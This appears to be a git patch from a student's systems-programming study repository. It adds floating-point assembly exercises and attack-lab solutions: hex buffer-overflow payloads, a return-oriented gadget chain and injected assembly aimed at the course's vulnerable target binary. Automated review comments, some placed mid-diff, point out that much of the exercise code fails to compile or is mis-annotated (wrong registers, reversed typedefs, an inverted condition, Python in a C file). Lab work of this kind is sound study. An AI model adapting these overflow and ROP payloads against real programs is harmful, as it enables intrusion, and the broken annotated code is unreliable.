From 7ae6aa6a64f3f697edb90bb573862bf31dd14e69 Mon Sep 17 00:00:00 2001
From: Mike Vink
Date: Tue, 9 Jul 2024 09:06:58 +0200
Subject: chapter 3: reading excercises + attacklab
---
 3/11_floating_point/50_fcvt2.c | 27 +++++++++++++++++++++++++++
 3/11_floating_point/51_cvt.c | 18 ++++++++++++++++++
 3/11_floating_point/52_args.c | 20 ++++++++++++++++++++
 3/11_floating_point/53_funct1.c | 29 +++++++++++++++++++++++++++++
 3/11_floating_point/54_funct2.c | 16 ++++++++++++++++
 3/11_floating_point/55_lc3.c | 7 +++++++
 3/11_floating_point/56_simplefun.c | 25 +++++++++++++++++++++++++
 3/11_floating_point/57_funct3.c | 27 +++++++++++++++++++++++++++
 labs/attacklab/solution/ctarget.1.txt | 1 +
 labs/attacklab/solution/ctarget.2.txt | 2 ++
 labs/attacklab/solution/ctarget.3.txt | 1 +
 labs/attacklab/solution/ctarget.4.txt | 9 +++++++++
 labs/attacklab/solution/farm.yaml | 35 +++++++++++++++++++++++++++++++++++
 labs/attacklab/solution/set_cookie.s | 3 +++
 labs/attacklab/solution/stack.c | 27 +++++++++++++++++++++++++++
 15 files changed, 247 insertions(+)
 create mode 100644 3/11_floating_point/50_fcvt2.c
 create mode 100644 3/11_floating_point/51_cvt.c
 create mode 100644 3/11_floating_point/52_args.c
 create mode 100644 3/11_floating_point/53_funct1.c
 create mode 100644 3/11_floating_point/54_funct2.c
 create mode 100644 3/11_floating_point/55_lc3.c
 create mode 100644 3/11_floating_point/56_simplefun.c
 create mode 100644 3/11_floating_point/57_funct3.c
 create mode 100644 labs/attacklab/solution/ctarget.1.txt
 create mode 100644 labs/attacklab/solution/ctarget.2.txt
 create mode 100644 labs/attacklab/solution/ctarget.3.txt
 create mode 100644 labs/attacklab/solution/ctarget.4.txt
 create mode 100644 labs/attacklab/solution/farm.yaml
 create mode 100644 labs/attacklab/solution/set_cookie.s
 create mode 100644 labs/attacklab/solution/stack.c
diff --git a/3/11_floating_point/50_fcvt2.c b/3/11_floating_point/50_fcvt2.c
new file mode 100644
index 0000000..052462e
--- /dev/null
+++ b/3/11_floating_point/50_fcvt2.c
@@ -0,0 +1,27 @@
+#include
+
+// ip = rdi
+// fp = rsi
+// dp = rdx
+// l = rcx
+// fcvt:
+// movl (%rdi), %eax eax<-int value of ip to eax
+// vmovss (%rsi), %xmm0 xmm0<- move int value to float (vmov signed single?)
+// vcvttsd2si (%rdx), %r8d r8d<- double value to signed integer?
+// movl %r8d, (%rdi) *ip<- set pointer to truncated value of rdx
+// vcvttsd2ss %eax, %xmm1, %xmm1 xmm1<- convert int to float
+// vmovss %xmm1, (%rsi) fp<-*ip
+// vcvtsi2sdq %rcx, %xmm1, %xmm1 xmm1<- convert long to double
+// vmovsd %xmm1, (%rdx) dp<- l
+// vunpcklps %xmm0, %xmm0, %xmm0
+// vcvtps2pd %xmm0, %xmm0
+// ret
+double fcvt2(int *ip, float *fp, double *dp, long l)
+{
+ int i = *ip; float f = *fp; double d = *dp;
+
+ *ip = (int) d;
+ *fp = (float) i;
+ *dp = (double) l;
+ return (double) f;
+}
diff --git a/3/11_floating_point/51_cvt.c b/3/11_floating_point/51_cvt.c
new file mode 100644
index 0000000..053a657
--- /dev/null
+++ b/3/11_floating_point/51_cvt.c
@@ -0,0 +1,18 @@
+typedef int dest_t
+typedef int src_t
+
+dest_t cvt(src_t x)
+{
+ dest_t y = (dest_t) x;
+ return y;
+}
+
+// T_x T_y Instruction(s)
+//
+// long double vcvtsi2sdq %rdi, %xmm0
+// double int vcvttsd2si %xmm0, %rdi
+// double float vmovddup %xmm0, %xmm0
+// vcvtpd2psx %xmm0, %xmm0
+// long float vcvtsi2ssq %rdi, %xmm0
+// float long vcvttss2siq %xmm0, %rdi
+//
diff --git a/3/11_floating_point/52_args.c b/3/11_floating_point/52_args.c
new file mode 100644
index 0000000..a21a235
--- /dev/null
+++ b/3/11_floating_point/52_args.c
@@ -0,0 +1,20 @@
+double g1(double a, long b, float c, int d);
+// a in xmm0
+// b in %rdi
+// c in xmm1
+// d in %rsi
+double g2(int a, double *b, float *c, long d);
+// a in %edi
+// b in %rsi
+// c in %rdx
+// d in %rcx
+double g3(double *a, double b, int c, float d);
+// a in %rdi
+// b in %rsi
+// c in %edx
+// d in %xmm0
+double g4(float a, int *b, float c, double d);
+// a in %xmm0
+// b in %rdi
+// c in %xmm1
+// d in %rsi
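Review bot: The annotation on the `vmovss (%rsi), %xmm0` comment line is wrong: vmovss is a plain scalar single-precision load of `*fp` into %xmm0 with no conversion, so the line should read `// vmovss (%rsi), %xmm0 xmm0 <- *fp (float load, no conversion)`. Three lines further down the comment names `vcvttsd2ss`, which is not an x86 mnemonic; the int-to-float conversion that matches `*fp = (float) i` in the C body is `vcvtsi2ss %eax, %xmm1, %xmm1`. The first line of the hunk is a bare `#include` with no header name, which will not preprocess; the `<...>` part may have been lost in rendering, so confirm against the working tree.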
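Review bot: The two typedefs at the top of the 51_cvt.c hunk lack their terminating semicolon, so the file does not compile; they should read `typedef int dest_t;` and `typedef int src_t;`. With both fixed to int, `cvt` as committed performs none of the conversions listed in the table below it, so a one-line comment stating that the typedefs are placeholders to be swapped per row of the table would make the intent clear.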
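Review bot: The register assignments under g3 and g4 in the 52_args.c hunk are wrong: the x86-64 System V convention hands floating-point arguments to %xmm0–%xmm7 in order and integer/pointer arguments to %rdi, %rsi, %rdx, %rcx in order, with the two sequences counted independently. For g3 that gives `// b in %xmm0`, `// c in %esi`, `// d in %xmm1` instead of %rsi, %edx, %xmm0, and for g4 the double `d` lands in `// d in %xmm2`, not %rsi. Under g1, `d` is an int, so `%esi` names the part of the register actually used; %rsi is the same register, so that one is only a precision nit.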
diff --git a/3/11_floating_point/53_funct1.c b/3/11_floating_point/53_funct1.c
new file mode 100644
index 0000000..8147b62
--- /dev/null
+++ b/3/11_floating_point/53_funct1.c
@@ -0,0 +1,29 @@
+typedef arg1_t int;
+typedef arg2_t double;
+typedef arg3_t double;
+
+typedef arg4_t double;
+double funct1(arg1_t p, arg2_t q, arg3_t r, double s)
+{
+ return p/(q+r) - s;
+}
+// funct 1:
+// vcvtsi2ssq %rsi, %xmm2, %xmm2 convert long to double?
+// vaddss %xmm0, %xmm2, %xmm0 xmm0 <- xmm2 + xmm0 (q+r)
+// vcvtsi2ss %edi, %xmm2, %xmm2 convert to float (p)
+// vdivss %xmm0, %xmm2, %xmm0 xmm0 <- xmm2 (p float) / xmm0 (q+r float)
+// vunpcklps %xmm0, %xmm0, %xmm0 convert float to double?
+// vcvtps2pd %xmm0, %xmm0 convert float to double?
+// vsubsd %xmm1, %xmm0, %xmm0 xmm0 <- xmm0 - (double) s?
+// ret
+
+// s must be in xmm1, it's only used at the end to subtract from xmm0, it must also be double since vsubsd is used
+//
+// p q r q+r p/(q+r)
+// rdi, int, since it's xmm0, float rsi, long float, xmm0 float, xmm0
+// converted
+// on line 3
+//
+// rdi, int, since it's rsi, long xmm0, float float, xmm0 float, xmm0
+// converted
+// on line 3
diff --git a/3/11_floating_point/54_funct2.c b/3/11_floating_point/54_funct2.c
new file mode 100644
index 0000000..66c26c8
--- /dev/null
+++ b/3/11_floating_point/54_funct2.c
@@ -0,0 +1,16 @@
+double funct2(double w, int x, float y, long z)
+{
+ return x*y - w/z;
+}
+
+// double funct2(double w, int x, float y, long z)
+// w in xmm0, x in edi, y in xmm1, z in rsi
+// funct2:
+// vcvtsi2ss %edi, %xmm2, %xmm2 // convert int to float
+// vmulss %xmm1, %xmm2, %xmm1 // xmm1<- x*y, multiply sencond and third float
+// vunpcklps %xmm1, %xmm1, %xmm1 // do convert float to double?
+// vcvtps2pd %xmm1, %xmm2 // do convert float to double?
+// vcvtsi2sdq %rsi, %xmm1, %xmm1 // xmm1 <- z, convert long to double?
+// vdivsd %xmm1, %xmm0, %xmm0 // xmm0<- w/z
+// vsubsd %xmm0, %xmm2, %xmm0 // xmm0<- (x*y) - w/z
+// ret
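Review bot: The typedefs at the top of the 53_funct1.c hunk are reversed — `typedef arg1_t int;` tries to declare a type named `int` and is a syntax error; the form is `typedef int arg1_t;`, and likewise for the others. The chosen types also contradict the author's own table at the end of the file: `typedef arg2_t double;` and `typedef arg3_t double;` make q and r doubles, but the table and the `vcvtsi2ssq %rsi` / `vaddss %xmm0` lines show one of them is a long in %rsi and the other a float in %xmm0 (either order fits), and doubles would have produced vaddsd rather than vaddss. `arg4_t` is declared but never used, since the signature writes `double s` directly. The `convert long to double?` annotation on `vcvtsi2ssq` should say long to float: the `ss` suffix means scalar single.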
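Review bot: The paired `vunpcklps` / `vcvtps2pd` lines in the 54_funct2.c hunk are annotated with a question mark, as they are in the 50_fcvt2.c, 53_funct1.c and 57_funct3.c hunks; the pair is the compiler's idiom for a float-to-double widening: vunpcklps duplicates the low single into the low two lanes and vcvtps2pd converts those two packed singles to doubles, of which only the low one is used afterwards. A single comment such as `// vunpcklps + vcvtps2pd: widen the low float to double` would settle all four. Here the widened result lands in %xmm2 (`vcvtps2pd %xmm1, %xmm2`), which is why the final `vsubsd %xmm0, %xmm2, %xmm0` reads x*y from %xmm2 and w/z from %xmm0.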
diff --git a/3/11_floating_point/55_lc3.c b/3/11_floating_point/55_lc3.c
new file mode 100644
index 0000000..31cd59e
--- /dev/null
+++ b/3/11_floating_point/55_lc3.c
@@ -0,0 +1,7 @@
+// 0000000000000404
+// 0000000000000000000000000000000000000000000000000000 01000000010 0
+//
+// V= 2^(1028 - 1023) * (1 + f)
+// V=2^5
+// V=32
+print("{:064x}".format(1077936128))
diff --git a/3/11_floating_point/56_simplefun.c b/3/11_floating_point/56_simplefun.c
new file mode 100644
index 0000000..66569fa
--- /dev/null
+++ b/3/11_floating_point/56_simplefun.c
@@ -0,0 +1,25 @@
+#define EXPR
+
+double simplefun(double x) {
+ return EXPR(x);
+}
+// A
+// vmovsd .LC1(%rip), %xmm1
+// vandpd %xmm1, xmm0, xmm0
+// .LC1:
+// 1111111111111111111111111111111111111111111111111111 11111111111 0
+//
+// Checks if any bit is set in the arg by anding with all ones
+//
+//
+// B
+// vxorpd %xmm0, %xmm0, %xmm0
+//
+// Sets the argument to zero
+//
+// C
+// vmovsd .LC2(%rip), %xmm1
+// vxorpd xmm1, %xmm0, %xmm0
+// 10000000000000000000000000000000 00000000000000000000000000000000
+//
+// Flipping the sign bit
diff --git a/3/11_floating_point/57_funct3.c b/3/11_floating_point/57_funct3.c
new file mode 100644
index 0000000..5397330
--- /dev/null
+++ b/3/11_floating_point/57_funct3.c
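Review bot: The bit-field line `// 0000…0 01000000010 0` in the 55_lc3.c hunk does not encode the value the following lines derive: read as the 11-bit exponent, `01000000010` is 514, while 2^(1028 − 1023) requires 1028, which is `10000000100` (bits 30–20 of 1077936128 = 0x40400000); the exponent string should be corrected, the derived V = 32 is right. The last line of the hunk, `print("{:064x}".format(1077936128))`, is Python inside a `.c` file, so the file does not compile — keep it as a `//` comment if it is meant as the scratch command that produced the pattern. `{:064x}` also pads to 64 hex digits, which matches neither the 32-bit word nor the 64-bit double pattern 0x4040000000000000 the comment describes; presumably `{:032b}` was intended, verify.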
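Review bot: The explanation under A in the 56_simplefun.c hunk is wrong: the `.LC1` pattern has every bit set except the sign bit (the trailing `0` in the author's fraction/exponent/sign layout), so `vandpd` with it clears the sign bit and leaves the rest of x unchanged — the function returns the absolute value of x, it does not "check if any bit is set" (an AND tests nothing; there is no flag use or branch). Suggested replacement: `// Clears the sign bit: EXPR(x) is fabs(x)`. Separately, `#define EXPR` is empty, so `EXPR(x)` expands to `(x)` and simplefun as committed is the identity; if the file is meant to compile as one of the three answers, define the macro for it, e.g. `#define EXPR(x) (-(x))` for C.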
@@ -0,0 +1,27 @@
+double funct3(int *ap, double b, long c, float *dp) {
+ int a = *ap;
+ float d = *dp;
+ if (b <= a) {
+ return (c * d);
+ }
+ return (c + 2 * d);
+}
+
+// ap in rdi, b in xmm0, c in rsi, dp in rdx
+// funct3:
+// vmovss (%rdx), %xmm1 // y <- dp
+// vcvtsi2sd (%rdi), %xmm2, %xmm2 // z <- (double a)
+// vucomisd %xmm2, %xmm0 // compare: (<= b z )
+// jbe .L8 // jump to .L8: if <
+// vcvtsi2ssq %rsi, %xmm0, %xmm0 // x <- (float) c
+// vmulss %xmm1, %xmm0, %xmm1 // y <- (* x y)
+// vunpcklps %xmm1, %xmm1, %xmm1 // float->double
+// vcvtps2pd %xmm1, %xmm0 // float->double
+// ret
+// .L8:
+// vaddss %xmm1, %xmm1, %xmm1 // y <- (+ y y )
+// vcvtsi2ssq %rsi, %xmm0, %xmm0 // x <- (float c)
+// vaddss %xmm1, %xmm0, %xmm0 // x <- x + y
+// vunpcklps %xmm0, %xmm0, %xmm0 // float->double
+// vcvtps2pd %xmm0, %xmm0 // float->double
+// ret
diff --git a/labs/attacklab/solution/ctarget.1.txt b/labs/attacklab/solution/ctarget.1.txt
new file mode 100644
index 0000000..2779c46
--- /dev/null
+++ b/labs/attacklab/solution/ctarget.1.txt
@@ -0,0 +1 @@
+ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de c0 17 40 00 00 00 00 00
diff --git a/labs/attacklab/solution/ctarget.2.txt b/labs/attacklab/solution/ctarget.2.txt
new file mode 100644
index 0000000..fb116d2
--- /dev/null
+++ b/labs/attacklab/solution/ctarget.2.txt
@@ -0,0 +1,2 @@
+bf fa 97 b9 59 68 ec 17 40 00 c3 de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de ef be ad de 78 dc 61 55 00 00 00 00
+
diff --git a/labs/attacklab/solution/ctarget.3.txt b/labs/attacklab/solution/ctarget.3.txt
new file mode 100644
index 0000000..0cdf60c
--- /dev/null
+++ b/labs/attacklab/solution/ctarget.3.txt
@@ -0,0 +1 @@
+48 c7 c7 a8 dc 61 55 68 fa 18 40 00 c3 00 00 00 00 00 00 00 00 00 ad de ef be ad de ef be ad de ef be ad de ef be ad de 78 dc 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00
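Review bot: The condition in the C body of the 57_funct3.c hunk is inverted relative to the assembly it annotates. `vucomisd %xmm2, %xmm0` compares b (%xmm0) with (double)a (%xmm2) and `jbe .L8` is taken when b <= a; the `.L8` block computes `c + 2*d` (`vaddss %xmm1, %xmm1, %xmm1` doubles d, then the converted c is added), whereas the fall-through block computes `c*d`. The body should therefore read `if (b <= a) { return (c + 2 * d); }` followed by `return (c * d);`, or equivalently `if (a < b) return c * d;`. The `// jump to .L8: if <` annotation should say `if b <= a` for the same reason.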
diff --git a/labs/attacklab/solution/ctarget.4.txt b/labs/attacklab/solution/ctarget.4.txt
new file mode 100644
index 0000000..d322873
--- /dev/null
+++ b/labs/attacklab/solution/ctarget.4.txt
@@ -0,0 +1,9 @@
+ef be ad de ef be ad de /* rsp - 40 */
+ef be ad de ef be ad de /* rsp - 32 */
+ef be ad de ef be ad de /* rsp - 24 */
+ef be ad de ef be ad de /* rsp - 16 */
+ef be ad de ef be ad de /* rsp - 8 */
+ab 19 40 00 00 00 00 00 /* return address: call addval_219+4 */
+fa 97 b9 59 00 00 00 00 /* cookie: popped into rax */
+a2 19 40 00 00 00 00 00 /* return address: call addval_273+2 */
+ec 17 40 00 00 00 00 00 /* return address: call touch2 */
diff --git a/labs/attacklab/solution/farm.yaml b/labs/attacklab/solution/farm.yaml
new file mode 100644
index 0000000..d425028
--- /dev/null
+++ b/labs/attacklab/solution/farm.yaml
@@ -0,0 +1,35 @@
+getval_142:
+ 3: |
+ nop
+ nop
+ ret
+
+addval_273:
+ 2: |
+ movq %rax, %rdi
+ ret
+ 3: |
+ movl %eax, %edi
+ ret
+
+addval_219:
+ 4: |
+ popq %rax
+ nop
+ ret
+
+# 00 00 00 00 00 40 17 ec // return address: call touch2
+# 00 00 00 00 00 40 19 a2 // return address: call addval_273+2
+# 00 00 00 00 a8 dc 61 55 // cookie: popped into rax
+# 00 00 00 00 00 40 19 ab // return address: call addval_219+4
+# ef be ad de ef be ad de // rsp - 8
+# ef be ad de ef be ad de // rsp - 16
+# ef be ad de ef be ad de // rsp - 24
+# ef be ad de ef be ad de // rsp - 32
+# ef be ad de ef be ad de // rsp - 40
+
+setval_237:
+
+setval_424:
+
+
diff --git a/labs/attacklab/solution/set_cookie.s b/labs/attacklab/solution/set_cookie.s
new file mode 100644
index 0000000..f11f435
--- /dev/null
+++ b/labs/attacklab/solution/set_cookie.s
@@ -0,0 +1,3 @@
+movq $0x5561dca8,%rdi
+pushq $0x00000000004018fa
+ret
diff --git a/labs/attacklab/solution/stack.c b/labs/attacklab/solution/stack.c
new file mode 100644
index 0000000..1c9002f
--- /dev/null
+++ b/labs/attacklab/solution/stack.c
@@ -0,0 +1,27 @@
+// 00 00 00 00 00 00 00 00 // free space: int val
+// 00 00 00 00 00 40 17 c0 // return address: call getbuf
+// ef be ad de ef be ad de // rsp - 8
+// ef be ad de ef be ad de // rsp - 16
+// ef be ad de ef be ad de // rsp - 24
+// ef be ad de ef be ad de // rsp - 32
+// ef be ad de ef be ad de // rsp - 40
+
+ef be ad de ef be ad de
+ef be ad de ef be ad de
+ef be ad de ef be ad de
+ef be ad de ef be ad de
+ef be ad de ef be ad de
+40 17 c0 00 00 00 00 00
+
+
+0x5561dc78: 0x17ec6859b997fabf 0xdeadbeefdec30040
+0x5561dc88: 0xdeadbeefdeadbeef 0xdeadbeefdeadbeef
+0x5561dc98: 0xdeadbeefdeadbeef 0x0000000000000000
+
+59 b9 97 fa
+
+006166373939623935
+
+0x5561dc78: 0xdeadbeefdeadbeef 0xdeadbeefdeadbeef
+0x5561dc88: 0xdeadbeefdeadbeef 0x35adbeefdeadbeef
+0x5561dc98: 0x0061663739396239 0x000000005561dc78
-- cgit v1.2.3